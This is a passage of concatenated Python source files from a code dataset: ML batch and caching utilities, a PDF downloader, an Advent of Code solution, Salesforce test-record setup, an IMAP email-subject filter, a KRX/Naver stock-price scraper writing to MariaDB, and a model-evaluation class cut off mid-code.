kLogging=False):\n\t\t\"\"\" Generator for sample-with-replacement -> Bagging \n\t\t\tReturn: the sample indices for maximum client side flexibility. Typically it will be used\n\t\t\t\t\tto call getBatchAsync() to do the heavy lifting.\n\t\t\"\"\"\n\t\tnumentries = self.size\n\t\tbatchsize = self.batchsize\n\n\t\tfor start in range(0, numentries, batchsize):\n#\t\t\tprint(f\"epoch[{start}]\", end='')\n\t\t\tend = min(start + batchsize, numentries)\n\t\t\t# Bagging here - sample with replacement\n\t\t\tindices = self.indices[start:end]\n\t\t\t#sample-with-replacement -> Bagging\n\t\t\tindices = self.rng.integers(numentries, size=len(indices))\n\t\t\tself.cur_batch = indices \t\t#for Minibatch persistency and Data Echoing\n\n\t\t\tyield indices \t#GENERATOR\n#end.. 
class Bagging\t\t\t\n\ndef verify2result(myresults1, myresults2):\n\tr1 = sorted(myresults1, key=lambda e: e.index)\t\n\tr2 = sorted(myresults2, key=lambda e: e.index)\t\n\n\tverified = True\n\tfor i in range(len(r1)):\n\t\titem01 = r1[i]\n\t\titem02 = r2[i]\n\t\t#1: compare our indices\n\t\tif item01.index != item02.index:\n\t\t\tverified = False\n\t\tdata1 = item01.data\n\t\tdata2 = item02.data\n\t\t#2: compare our ndarrays(images)\n\t\tif np.array_equal(data1.coeffs, data2.coeffs) == False:\n\t\t\tprint(f\"[{i}]: {data1.coeffs}, {data2.coeffs}\")\n\t\t\tverified = False\n\t\t#3: compare our labels\n\t\tif data1.label != data2.label:\n\t\t\tverified = False\n\n\tassert(verified)\n\treturn verified\n\n#\n# asyncio: https://docs.python.org/3/library/asyncio-task.html#task-object\n#\nGetDesc = namedtuple(\"GetDesc\", \"index data\")\n\nasync def get1(dataset, index):\n\treturn GetDesc(index, dataset[index])\n\nasync def getBatch(dataset, indices, logging=False):\n\tbatchsize = len(indices)\n\timglist = []\t#for collecting the results from async complete callback\n\tlabellist = []\n\t\n\tdef oneDone(task):\n\t\t#https://stackoverflow.com/questions/44345139/python-asyncio-add-done-callback-with-async-def\n\t\tmyresult = task.result()\n\t\timglist.append(myresult.data.coeffs)\n\t\tlabellist.append(np.int64(myresult.data.label))\t# Torch seems to want labels as torch.long which is int64\n\n\t#1: sort indices to get a sequential access order - optimize IO\n\tbatch = np.sort(indices)\n\n\tif (logging):\n\t\tprint(f\"batch = {batch}\")\n\n\ttasks = []\n\t#1: issue concurrent load for the whole batch\n\tfor i in batch:\n\t\tt = asyncio.create_task(get1(dataset, i))\n\t\tt.add_done_callback(oneDone)\n\t\ttasks.append(t)\n\n\t#2: parallel wait on all concurrent tasks\t\n \t#https://stackoverflow.com/questions/42231161/asyncio-gather-vs-asyncio-wait\n\tdone, pending = await asyncio.wait(tasks)\t#, return_when=asyncio.FIRST_COMPLETED\n\tassert(len(pending) == 0)\n\n\t#optionally retrieve each result direct from the tasks to verify add_done_callback()\n\tif kVerifyResults:\n\t\tmyresults2 = [task.result() for task in done]\n\t\tverify2result(myresults, myresults2)\n\n\t#TODO: change get1() to directly output to a ndarray\n\treturn np.asarray(imglist), np.asarray(labellist)\n\ndef getBatchAsync(dbchunk, batch, logging=False):\n\t\"\"\" get 'batch' which is an array of indices \n\t\tRet: ndarray((batchsize, width, height), dtype=float32)\n\t\"\"\"\n\tresults = asyncio.run(getBatch(dbchunk, batch, logging))\n\treturn results\n\n#\n# Unit test routines:\n#\nfrom shnetutil.pipeline import loadMNIST\n\ndef test_epochgen(mnist_train, bsize):\n\t\"\"\" use .epoch() generator on the BatchBuilder \"\"\"\n\ttrainbatchbuilder = Bagging(mnist_train, bsize)\n\tlabels1 = []\n\tfor i in range(epochs):\n\t\tlabelcnt = Counter()\n\t\ttrainiter = trainbatchbuilder.epoch(False)\n\t\t#trainiter = iter(train_loader)\n\t\tfor b, mybatch in enumerate(trainiter):\n\t\t\t#'mybatch' is an array of indices defining the minibatch samples\n\t\t\t#print(mybatch[10:])\n\t\t\timages, labels = getBatchAsync(mnist_train, mybatch)\n\t\t\t#images, label = batch_\n\t\t\tprint(f\"[{i,b}]{mybatch.shape}, {images.shape}\")\n\t\t\tlabelcnt.update(labels)\n\t\t\tlabels1.append(labels)\n\t\tprint(labelcnt)\t\n\treturn labels1\n\t\t\ndef test_selfIter(mnist_train, bsize):\n\t\"\"\" use iter() on the BatchBuilder itself \"\"\"\n\ttrainbatchbuilder = Bagging(mnist_train, bsize)\n\tlabels2 = []\n\tfor i in range(epochs):\n\t\ttrainiter = 
iter(trainbatchbuilder)\n\t\tlabelcnt = Counter()\n\n\t\tfor b, mybatch in enumerate(trainiter):\n\t\t\timages, labels = mybatch\n\t\t\tprint(f\"[{i,b}]{type(mybatch)}, {images.shape}\")\n\t\t\tlabelcnt.update(labels)\n\t\t\tlabels2.append(labels)\n\t\tprint(labelcnt)\n\treturn labels2\t\n\ndef test_iterObj(mnist_train, bsize):\n\t\"\"\" standalone iterator .BatchIterator \"\"\"\n\ttrainbatchbuilder = Bagging(mnist_train, bsize)\n\ttrain_loader = BatchIterator(trainbatchbuilder)\n\n\tlabels1 = []\n\tfor i in range(epochs):\n\t\tlabelcnt = Counter()\n\n\t\tfor b, mybatch in enumerate(train_loader):\n\t\t\timages, labels = mybatch\n\t\t\tprint(f\"[{i,b}]{type(mybatch)}, {images.shape}\")\n\t\t\tlabelcnt.update(labels)\n\t\t\tlabels1.append(labels)\n\t\tprint(labelcnt)\t\n\treturn labels1\n#\n# BatchCache:\n#\nclass BatchCache(BatchBuilderBase):\n\tdef __init__(\n\t\tself,\n\t\tbatchsize:int,\n\t\tbatchbuilder: BatchBuilderBase,\n\t\txform = None,\n\t):\t\n\t\tassert((batchbuilder == None) or (not batchbuilder.shuffle))\n\t\tself.batchsize = batchsize\n\t\tself.batchbuilder = batchbuilder\n\t\t#self.dataset = batchbuilder.dataset\n\t\tself.xform = xform\n\t\tself.capture = True\n\t\tself.reset()\n\n\tdef __len__(self):\n\t\treturn len(self.cache)\n\t\t#return len(self.batchbuilder)\n\n\tdef __getitem__(self, index:int):\n\t\t\"\"\" index cached batches \"\"\"\n\t\treturn self.cache[index]\n\n\tdef __deepcopy__(self, memo):\n\t\t#print(f\"BatchCache.__deepcopy__\")\n\t\treturn self\n\n\tdef getitem(self, index:int):\n\t\t\"\"\" Treating all batches as a 1-d array of self.size \"\"\"\n\t\tb, offset = divmod(index, self.batchsize)\n\t\treturn self.cache[b][offset]\t\t\n\n\tdef reset(self):\n\t\tself.cache = []\n\t\tself.size = 0\n\n\tdef setcapture(self, enable:bool):\n\t\tself.capture = enable\t\n\n\tdef finalize(self):\n\t\t\"\"\" Finished first epoch, caching is done \"\"\"\n\t\tself.setcapture(False) \t#next epoch will be replay of capture\n\t\tprint(f\"BatchCache.finalize={self.size}\")\n\t\t#torch.save(self.cache, \"batchcacheX\")\t#1.52gb for 10k test\n\n\tdef rand_indices(self, num):\t\n\t\tpass\n\n\tdef insert(self, batchdata: tuple):\n\t\tshape = batchdata.shape\n\t\tself.size += shape[0] \t\t#size of batch\n\t\t#print(f\"insert {shape}\")\n\t\tself.cache.append(batchdata.detach().cpu())\n\n\tdef loadcache(self, kLogging=False):\n\t\ttic1 = time.time()\n\t\tbatchbuilder = self.batchbuilder\n\t\tepoch = batchbuilder.epoch(False)\n\n\t\tfor b, mybatch in enumerate(epoch):\n\t\t\timglist, labels = getBatchAsync(batchbuilder.dataset, mybatch)\n\t\t\timglist = self.xform(np.asarray(imglist))\n\t\t\tself.insert(imglist)\n\t\tif kLogging:\n\t\t\ttime_spent(tic1, f\"loadcache\", count=1)\t#5.61/e,\n\t\t\n\tdef epoch(self, kLogging=False):\n\t\tif self.capture:\n\t\t\tself.loadcache(kLogging=kLogging)\n\t\tfor batch in self.cache:\n\t\t\tyield batch\n#end of BatchCache\t\t\t\n\nclass CachedDataset(dataset_base.DataSet):\n\t\"\"\" An adaptor for BatchCache to make it into a DataSet \"\"\"\n\tdef __init__(self, batchcache: BatchCache, colorspace = \"grayscale\"):\n\t\tassert(issubclass(type(batchcache), BatchCache))\n\t\tsuper().__init__(\"cachedDataset\", colorspace)\n\t\tself.batchcache = batchcache\n\t\tself.batchsize = batchcache.batchsize\n\t\tself.cached = batchcache.cache\n\n\t\t#1: verify the total count of all cached batches\n\t\tcount = 0\n\t\tfor batch in self.cached:\n\t\t\tshape = batch.shape\n\t\t\tcount += shape[0]\n\t\tassert(count == batchcache.size)\t\n\t\tself.size = 
count\n\t\tself.getter = self.doubleIndexGetter\n\t\tself.finalized = False\n\n\tdef finalize(self):\n\t\tself.finalized = True\n\t\tself.cached = cplx.cat(self.cached, dim = 0)\n\t\tself.getter = self.singleIndexGetter\n\t\treturn\n\n\tdef __getitem__(self, index:int):\n\t\treturn self.getter(index)\n\t\t\n\tdef doubleIndexGetter(self, index: int):\n\t\tb, offset = divmod(index, self.batchsize)\n\t\treturn self.cached[b][offset]\n\n\tdef singleIndexGetter(self, index: int):\n\t\treturn self.cached[index]\n\n\tdef __len__(self):\n\t\treturn self.size\n#end of CachedDataset\n\ndef verifyBatchCache(batchbuilder, xform):\n\tdbchunk = batchbuilder.dataset\n\tbatchcache = BatchCache(batchbuilder.batchsize, batchbuilder, xform)\t#BatchCache takes (batchsize, batchbuilder, xform)\n\tbatchcache.loadcache(True)\n\n\tepoch = batchbuilder.epoch()\n\n\ttic2 = time.time()\n\tfor b, mybatch in enumerate(epoch):\n\t\timglist, labels = getBatchAsync(dbchunk, mybatch)\n\t\timglist = xform(np.asarray(imglist))\n\t\t#print(f\"b[{b}] {len(imglist)}, {type(imglist)}, {type(batchcache.cache[b][0])}\")\n\t\t#print(f\"b[{b}] {len(labels)}, {type(labels)}, {type(batchcache.cache[b][1])}\")\n\t\tif b == 0:\n\t\t\t#print(labels, batchcache.cache[b][1])\n\t\t\timg00 = imglist[0,:,:]\n\t\t\timg10 = batchcache.cache[b][0][0,:,:]\n\t\t\tprint(f\"imglist[0,:,:].shape {img00.shape}, batchcache.cache[b][0][0,:,:].shape {img10.shape}\")\n\t\t\t#print(img00[:1].real, img10[:1].real)\n\t\t#assert(np.array_equal(batchcache.cache[b][1], labels))\n\t\tassert(np.array_equal(batchcache.cache[b].numpy(), imglist.numpy()))\n\ttime_spent(tic2, f\"verify xform\", count=1)\t#5.61/e\n\n\nif __name__ == '__main__':\n\tfashiondir = projconfig.getFashionMNISTFolder()\n\n\t#dataset = MNIST('mnist', train=True, download=True, transform=MNIST_TRANSFORM)\n\tmnist_train = loadMNIST.getdb(fashiondir, istrain=False, kTensor = False)\n\tprint(f\"mnist_train {len(mnist_train)} from {fashiondir}\")\n\n\tbsize = 1000\n\tepochs = 2\n\n\t#1: use .epoch() generator interface\n\tlabels1 = test_epochgen(mnist_train, bsize)\n\n\t#2: use iter() on the BatchBuilder itself\n\tlabels2 = test_selfIter(mnist_train, bsize)\n\n\t#3: use standalone iterator\n\tlabels3 = test_iterObj(mnist_train, bsize)\n\n\tfor i in range(len(labels1)):\n\t\tl1 = labels1[i]\n\t\tl2 = labels2[i]\n\t\tl3 = labels3[i]\n\t\tassert(np.equal(l1, l2).all())\n\t\tassert(np.equal(l1, l3).all())\n\tprint(f\"passed assert(np.equal(l1, l2).all())\")\t\n\tprint(f\"passed assert(np.equal(l1, l3).all())\")\t\n\t\t","repo_name":"Ujjawal-K-Panchal/coshnet","sub_path":"libs/shnetutil/shnetutil/pipeline/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":15555,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"54"} +{"seq_id":"7269885041","text":"import os\nfrom requests import get\n\nurl = 'http://www.ntma.ie/download/dail_bonds_outstanding_reports/OutstandingBondsreport-2017-11-02.pdf'\n\nf1 = os.stat('1.pdf').st_mtime\nf2 = os.stat('2.pdf').st_mtime\n\nif f1 > f2:\n print(f1)\n print(f2)\n with open('2.pdf', 'wb') as f:\n f.write(get(url).content)\nif f1 < f2:\n print(\"f2\")\n with open('1.pdf', 'wb') as f:\n f.write(get(url).content)\n","repo_name":"rzegnam/first_script_ever","sub_path":"ready_scripts/modication_time.py","file_name":"modication_time.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"20271090823","text":"import re\nfrom datetime import datetime\nfrom collections import Counter, 
defaultdict\nfrom aoc.util.load_input import load_input, build_filename\n\n\ndef parse_line(line):\n # (date), (desc (guard) (wakes up) (falls asleep))\n pattern = r\"\\[(.*)\\] (Guard #(\\d+) begins shift|(wakes up)|(falls asleep))\"\n res = re.match(pattern, line)\n date, _, guard, wakes_up, falls_asleep = res.groups()\n\n datetime_format = \"%Y-%m-%d %H:%M\"\n date = datetime.strptime(date, datetime_format)\n if guard:\n guard = int(guard)\n return (date, guard, wakes_up, falls_asleep)\n\n\ndef get_input_from_file(name, parse=True, sort_by_date=True):\n input = load_input(build_filename(__file__, name), typ=str)\n\n if parse:\n input = [parse_line(l) for l in input]\n if sort_by_date:\n input.sort(key=lambda x: x[0])\n else:\n assert not sort_by_date, \"can only sort if parsing\"\n\n return input\n\n\ndef solve_day4_part1(entries):\n minute_tracker = defaultdict(Counter)\n current_guard = None\n current_guard_fell_asleep = None\n most_minutes_slept = 0\n guard_who_slept_most = None\n for date, guard, wakes_up, falls_asleep in entries:\n if guard:\n current_guard = guard\n current_guard_minutes_slept = 0\n elif falls_asleep:\n current_guard_fell_asleep = date\n elif wakes_up:\n for minute in range(current_guard_fell_asleep.minute, date.minute):\n minute_tracker[current_guard][minute] += 1\n minutes_asleep = date.minute - current_guard_fell_asleep.minute\n current_guard_minutes_slept += minutes_asleep\n if current_guard_minutes_slept > most_minutes_slept:\n most_minutes_slept = current_guard_minutes_slept\n guard_who_slept_most = current_guard\n \n\n minutes = minute_tracker[guard_who_slept_most]\n minute, _ = minutes.most_common(1)[0]\n\n return minute * guard_who_slept_most\n\nif __name__ == \"__main__\":\n test_input_raw = get_input_from_file(\"test_input\", parse=False, sort_by_date=False)\n test_input = get_input_from_file(\"test_input\", parse=True)\n\n events = get_input_from_file(\"input\", parse = True)\n answer = solve_day4_part1(events)\n print(\"Day 4 Part 1 answer: The product of guard x minutes slept is {}\".format(answer))\n\n","repo_name":"wconstab/algo","sub_path":"aoc/day4/solve_day4.py","file_name":"solve_day4.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72245389601","text":"import logging\n\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom faker import Faker\n\nimport sfdc\n\nfake = Faker()\n\ndef setup_test_records():\n aid = create_account()\n\n if not aid:\n logging.warning('Account could not be created. Halting.')\n return\n\n cid = create_contact(aid)\n\n if not cid:\n logging.warning('Contact could not be created. Halting.')\n rollback(aid)\n return\n\n oid = create_opportunity(aid, cid)\n\n if not oid:\n logging.warning('Opportunity could not be created. 
Halting.')\n rollback(aid, cid)\n return\n\n logging.info('Done!')\n\n\ndef rollback(account_id: str, contact_id: str=''):\n logging.info('Rolling back inserted records...')\n\n if contact_id:\n sfdc.sfdc_client.inner_client.Contact.delete(contact_id)\n\n sfdc.sfdc_client.inner_client.Account.delete(account_id)\n\ndef create_opportunity(account_id: str, contact_id: str):\n oid = ''\n close_date_str = datetime.now().isoformat().split('T')[0]\n contract_end_date_str = (datetime.now() + relativedelta(years=1, days=-1)).isoformat().split('T')[0]\n\n opp_payload = {\n 'Name': f'Test Opp {datetime.now().isoformat()}',\n 'RecordTypeId': '0123g000000PP5Q',\n 'AccountId': account_id,\n 'Type': 'New Subscription',\n 'StageName': '3. Preparing for Trial Check-In',\n 'CloseDate': close_date_str,\n 'Decision_Maker__c': contact_id,\n 'Contract_Start_Date__c': close_date_str,\n 'Contract_End_Date__c': contract_end_date_str\n }\n\n logging.info('Creating Opportunity...')\n result = sfdc.sfdc_client.inner_client.Opportunity.create(opp_payload)\n\n if result['success']:\n oid = result['id']\n logging.info(f\"Opportunity Id: {oid}\")\n else:\n for err in result['errors']:\n logging.error(err)\n\n return oid\n\ndef create_contact(account_id: str):\n cid = ''\n first_name = fake.first_name()\n last_name = fake.last_name()\n email = fake.ascii_company_email()\n\n contact_payload = {\n 'AccountId': account_id,\n 'FirstName': first_name,\n 'LastName': last_name,\n 'Email': email,\n 'Type__c': 'Other',\n 'LeadSource': 'Other',\n 'Status_of_User__c': 'Inactive'\n }\n\n logging.info('Creating Contact...')\n result = sfdc.sfdc_client.inner_client.Contact.create(contact_payload)\n\n if result['success']:\n cid = result['id']\n logging.info(f\"Contact Id: {cid}\")\n else:\n for err in result['errors']:\n logging.error(err)\n\n return cid\n\n\ndef create_account():\n aid = ''\n company_name = fake.company()\n\n account_payload = {\n 'Name': f\"OPRD - {company_name}\",\n 'Type': 'AlphaSense Internal'\n }\n\n logging.info('Creating Account...')\n result = sfdc.sfdc_client.inner_client.Account.create(account_payload)\n\n\n if result['success']:\n aid = result['id']\n logging.info(f\"Account Id: {aid}\")\n else:\n for err in result['errors']:\n logging.error(err)\n\n\n\n return aid","repo_name":"KevinJMcGrath/OPRD_Utility","sub_path":"sfdc/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30804391073","text":"import imaplib\r\nimport email\r\nimport os\r\n\r\n\r\nmail = imaplib.IMAP4_SSL('imap.gmail.com')\r\nmail.login('a0916295361@gmail.com', 'your_app_password')\r\n\r\n\r\n\r\nmail.select(\"inbox\")\r\n\r\n# search criteria\r\nsearch_criteria = 'UNSEEN OR SUBJECT \"BOUGHT\" SUBJECT \"SOLD\"'\r\n\r\n# search for messages matching the criteria\r\nresult, data = mail.search(None, search_criteria)\r\n\r\n# check each message subject\r\nfor num in data[0].split():\r\n typ, msg_data = mail.fetch(num, '(RFC822)')\r\n email_message = email.message_from_bytes(msg_data[0][1])\r\n subject = email_message['subject']\r\n \r\n if len(subject) < 43:\r\n \r\n with open(os.path.join(r'D:\\\\trading_terminal\\\\trade_big_data', 'email_subjects.txt'), 'a') as f:\r\n f.write(subject + '\\n')\r\n print(subject)\r\nmail.logout()\r\n\r\n\r\ndef extract_TQQQ_subjects(input_file_path, output_file_path):\r\n with open(input_file_path, 'r') as f_input, \\\r\n open(output_file_path, 'w') as f_output:\r\n \r\n for line in f_input:\r\n if 'TQQQ' in line:\r\n 
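# keep only the subject lines that mention the TQQQ ticker\r\n 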
f_output.write(line)\r\n \r\ninput_file_path =r'D:\\trading_terminal\\trade_big_data\\email_subjects.txt'\r\noutput_file_path =r'D:\\trading_terminal\\trade_big_data\\TQQQ_subjects.txt'\r\nextract_TQQQ_subjects(input_file_path, output_file_path)\r\n\r\ndef extract_SQQQ_subjects(input_file_path, output_file_path):\r\n with open(input_file_path, 'r') as f_input, \\\r\n open(output_file_path, 'w') as f_output:\r\n \r\n for line in f_input:\r\n if 'SQQQ' in line:\r\n f_output.write(line)\r\n \r\ninput_file_path =r'D:\\\\trading_terminal\\\\trade_big_data\\\\email_subjects.txt'\r\noutput_file_path =r'D:\\\\trading_terminal\\\\trade_big_data\\\\SQQQ_subjects.txt'\r\nextract_SQQQ_subjects(input_file_path, output_file_path)\r\n\r\n\r\n\r\n","repo_name":"bensonalioth/trading_terminal","sub_path":"imap.py","file_name":"imap.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11980362870","text":"from datetime import datetime\nimport calendar\nfrom threading import Timer\nimport json\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom src.etc.utils.maria_client import get_connection\n\n\nclass DBUpdater:\n def __init__(self):\n company_ddl = \"\"\"\n CREATE TABLE IF NOT EXISTS company_info (\n code VARCHAR(20),\n company VARCHAR(40),\n last_update DATE,\n PRIMARY KEY (code)\n )\n \"\"\"\n\n daily_ddl = \"\"\"\n CREATE TABLE IF NOT EXISTS daily_price (\n code VARCHAR(20),\n date DATE,\n open BIGINT(20),\n high BIGINT(20),\n low BIGINT(20),\n close BIGINT(20),\n diff BIGINT(20),\n volume BIGINT(20),\n PRIMARY KEY (code, date)\n )\n \"\"\"\n\n self.conn = get_connection('/srv/stock/config/config.json')\n\n with self.conn.cursor() as curs:\n curs.execute(company_ddl)\n curs.execute(daily_ddl)\n\n self.conn.commit()\n self.codes = dict()\n self.update_comp_info()\n\n def __del__(self):\n self.conn.close()\n\n # this does not really need to live inside the class\n def read_krx_code(self):\n url = \"https://dev-kind.krx.co.kr/corpgeneral/corpList.do?method=download&searchType=13\"\n krx = pd.read_html(url, header=0)[0]\n krx = krx[['종목코드', '회사명']]\n krx = krx.rename(columns={'종목코드': 'code', '회사명': 'company'})\n krx.code = krx.code.map('{:06d}'.format)\n return krx\n\n def update_comp_info(self):\n company_select_sql = \"\"\"\n SELECT *\n FROM company_info\n \"\"\"\n\n select_last_update = \"\"\"\n SELECT MAX(last_update) \n FROM company_info\n \"\"\"\n\n company_info = pd.read_sql(company_select_sql, self.conn)\n for idx in range(len(company_info)):\n self.codes[company_info['code'].values[idx]] = company_info['company'].values[idx]\n\n with self.conn.cursor() as curs:\n curs.execute(select_last_update)\n rs = curs.fetchone()\n today = datetime.today().strftime('%Y-%m-%d')\n\n if rs[0] is None or rs[0].strftime('%Y-%m-%d') < today:\n krx = self.read_krx_code()\n for idx in range(len(krx)):\n code = krx.code.values[idx]\n company = krx.company.values[idx]\n update_company_info = f\"\"\"\n REPLACE INTO company_info \n (code, company, last_update)\n VALUES\n ('{code}', '{company}', '{today}')\n \"\"\"\n curs.execute(update_company_info)\n self.codes[code] = company\n\n self.conn.commit()\n\n def read_naver(self, code, company, pages_to_fetch):\n df = None\n try:\n url = f'http://finance.naver.com/item/sise_day.nhn?code={code}'\n # grab the href attribute from the anchor to obtain the last page number string\n with urlopen(url) as doc:\n html = BeautifulSoup(doc, 'lxml')\n pgrr = html.find('td', class_='pgRR')\n s = str(pgrr.a['href']).split('=')\n 
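# illustrative: an href such as '/item/sise_day.nhn?code=005930&page=613' splits so that s[-1] is the last page number ('613')\n 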
str(pgrr.a['href']).split('=')\n                lastpage = s[-1]\n                df = pd.DataFrame()\n                pages = min(int(lastpage), pages_to_fetch)  # cap at the requested page count if the site's last page is larger\n\n                for page in range(1, pages + 1):\n                    pg_url = f'{url}&page={page}'\n                    df = df.append(pd.read_html(pg_url, header=0)[0])\n                df = df.rename(columns={\n                    '날짜': 'date',\n                    '시가': 'open',\n                    '종가': 'close',\n                    '고가': 'high',\n                    '저가': 'low',\n                    '전일비': 'diff',\n                    '거래량': 'volume'\n                })\n                # what about the adjusted close?\n                df['date'] = df['date'].str.replace('.', '-')  # element-wise: '2021.01.04' -> '2021-01-04'\n                df.dropna(inplace=True)\n                df[['open', 'close', 'high', 'low', 'diff', 'volume']] = \\\n                    df[['open', 'close', 'high', 'low', 'diff', 'volume']].astype(int)\n                df = df[['date', 'open', 'close', 'high', 'low', 'diff', 'volume']]\n        except Exception as e:\n            print(f'Exception occurred : {e}')\n            raise e\n        return df\n\n    def replace_into_db(self, df, num, code, company):\n        with self.conn.cursor() as curs:\n            for r in df.itertuples():\n                sql = f\"\"\"\n                REPLACE INTO daily_price \n                VALUES\n                ('{code}', '{r.date}', {r.open}, {r.close}, {r.high}, {r.low}, {r.diff}, {r.volume})\n                \"\"\"\n                curs.execute(sql)\n            self.conn.commit()\n\n    def update_daily_price(self, pages_to_fetch):\n        for idx, code in enumerate(self.codes):\n            df = self.read_naver(code, self.codes[code], pages_to_fetch)\n            if df is None:\n                continue\n            self.replace_into_db(df, idx, code, self.codes[code])\n\n    def execute_daily(self):\n        config_file = 'config.json'\n        self.update_comp_info()\n        try:\n            with open(config_file, 'r') as in_file:\n                config = json.load(in_file)\n                pages_to_fetch = config['pages_to_fetch']\n        except FileNotFoundError as fne:\n            with open(config_file, 'w') as out_file:\n                pages_to_fetch = 100\n                config = {'pages_to_fetch': 1}\n                json.dump(config, out_file)\n        self.update_daily_price(pages_to_fetch)\n\n        tmnow = datetime.now()\n        lastday = calendar.monthrange(tmnow.year, tmnow.month)[1]\n        year = tmnow.year\n        month = tmnow.month\n        day = tmnow.day\n        if tmnow.month == 12 and tmnow.day == lastday:  # last day of the last month of the year\n            year = tmnow.year + 1\n            month = 1\n            day = 1\n        elif tmnow.day == lastday:\n            month = tmnow.month + 1\n            day = 1\n        else:\n            day = tmnow.day + 1\n        tmnext = tmnow.replace(year=year, month=month, day=day, hour=17, minute=0, second=0)\n        tmdiff = (tmnext - tmnow).total_seconds()\n        t = Timer(tmdiff, self.execute_daily)\n        t.start()\n\n\nif __name__ == '__main__':\n    print('DB Updater')\n    updater = DBUpdater()\n    updater.execute_daily()\n","repo_name":"juneyoung/stock_test","sub_path":"src/week3/Investar/DBUpdater.py","file_name":"DBUpdater.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"36659805659","text":"from credit_default.entity import artifact_entity, config_entity\nfrom credit_default.exception import CustomException\nfrom credit_default.logger import logging\nfrom credit_default.utils import load_object, load_numpy_array_data\nfrom credit_default.predictor import ModelResolver\nimport sys\nimport pandas as pd\nimport numpy as np\nfrom credit_default.config import TARGET_COLUMN\nfrom sklearn.metrics import f1_score\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import RobustScaler\n\nclass ModelEvaluation:\n    def __init__(self,\n                 model_eval_config: config_entity.ModelEvaluationConfig,\n                 data_ingestion_artifact: artifact_entity.DataIngestionArtifact,\n                 data_transformation_artifact: artifact_entity.DataTransformationArtifact,\n                 model_trainer_artifact: artifact_entity.ModelTrainerArtifact):\n        try:\n            logging.info(f\"{'>>' * 20} Model Evaluation {'<<' * 
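The next-run scheduling in execute_daily hand-rolls month and year rollover before arming a Timer for 17:00. A compact, stdlib-only check of that rollover logic (a sketch, not from the original repo):

```python
import calendar
from datetime import datetime

def next_run(now):
    # Schedule for 17:00 the next day, bumping month/year on month-end.
    lastday = calendar.monthrange(now.year, now.month)[1]
    year, month, day = now.year, now.month, now.day + 1
    if now.month == 12 and now.day == lastday:
        year, month, day = now.year + 1, 1, 1
    elif now.day == lastday:
        month, day = now.month + 1, 1
    return now.replace(year=year, month=month, day=day,
                       hour=17, minute=0, second=0, microsecond=0)

print(next_run(datetime(2021, 12, 31, 18, 0)))  # 2022-01-01 17:00:00
print(next_run(datetime(2021, 6, 30, 9, 0)))    # 2021-07-01 17:00:00
```

Note that the gap to the next run can exceed 24 hours, which is why `total_seconds()` (rather than the `.seconds` attribute, which discards whole days) is the safe way to compute the Timer delay.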
20}\")\n self.model_eval_config = model_eval_config\n self.data_ingestion_artifact = data_ingestion_artifact\n self.data_transformation_artifact = data_transformation_artifact\n self.model_trainer_artifact = model_trainer_artifact\n self.model_resolver = ModelResolver()\n except Exception as e:\n raise CustomException(e, sys)\n\n def initiate_model_evaluation(self, test_arr: np.ndarray) -> artifact_entity.ModelEvaluationArtifact:\n try:\n logging.info(\"Checking if the saved model folder has a model and comparing the trained models\")\n latest_dir_path = self.model_resolver.get_latest_dir_path()\n if latest_dir_path is None:\n model_eval_artifact = artifact_entity.ModelEvaluationArtifact(\n is_model_accepted=True,\n improved_accuracy=None\n )\n logging.info(f\"Model evaluation artifact: {model_eval_artifact}\")\n return model_eval_artifact\n\n logging.info(\"Finding the locations of the transformer model and model\")\n transformer_path = self.model_resolver.get_latest_transformer_path()\n model_path = self.model_resolver.get_latest_model_path()\n\n logging.info(\"Loading the previously trained transformer and model\")\n transformer = load_object(file_path=transformer_path)\n model = load_object(file_path=model_path)\n\n logging.info(\"Loading the currently trained transformer and model\")\n current_transformer = load_object(file_path=self.data_transformation_artifact.transform_object_path)\n current_model = load_object(file_path=self.model_trainer_artifact.model_path)\n\n logging.info(\"Transforming the test data using the current transformer\")\n \n # Transforming the test data using the current transformer\n transformed_test_arr = current_transformer.named_steps['RobustScaler'].transform(test_arr[:, :-1])\n\n # Ensure the number of features in the test data matches the expected number\n if transformed_test_arr.shape[1] != current_transformer.named_steps['RobustScaler'].n_features_in_:\n raise ValueError(\"Number of features in the test data is not compatible with the transformer\")\n\n # Add the target column back to the transformed test data\n transformed_test_arr_with_target = np.hstack((transformed_test_arr, test_arr[:, -1].reshape(-1, 1)))\n\n logging.info(\"Calculating accuracy using the current trained model\")\n y_pred = current_model.predict(transformed_test_arr_with_target[:, :-1]) # Predict using the current model\n print(f\"Prediction using the trained model: {y_pred[:5]}\")\n current_model_score = f1_score(y_true=test_arr[:, -1], y_pred=y_pred)\n logging.info(f\"Accuracy using the current trained model: {current_model_score}\")\n\n if latest_dir_path:\n logging.info(\"Calculating accuracy using the previous trained model\")\n print(f\"Number of features in test data: {test_arr.shape[1]}\")\n print(f\"Number of features in transformed test data: {transformed_test_arr.shape[1]}\")\n \n input_arr = transformer.transform(test_arr[:, :-1]) # Exclude the target column during transformation\n y_pred = model.predict(input_arr)\n print(f\"Prediction using previous model: {y_pred[:5]}\")\n previous_model_score = f1_score(y_true=test_arr[:, -1], y_pred=y_pred)\n logging.info(f\"Accuracy using previous trained model: {previous_model_score}\")\n\n if float(current_model_score) <= float(previous_model_score):\n logging.info(\"The current trained model is not better than the previous model\")\n raise Exception(\"The current trained model is not better than the previous model\")\n\n model_eval_artifact = artifact_entity.ModelEvaluationArtifact(\n is_model_accepted=True,\n 
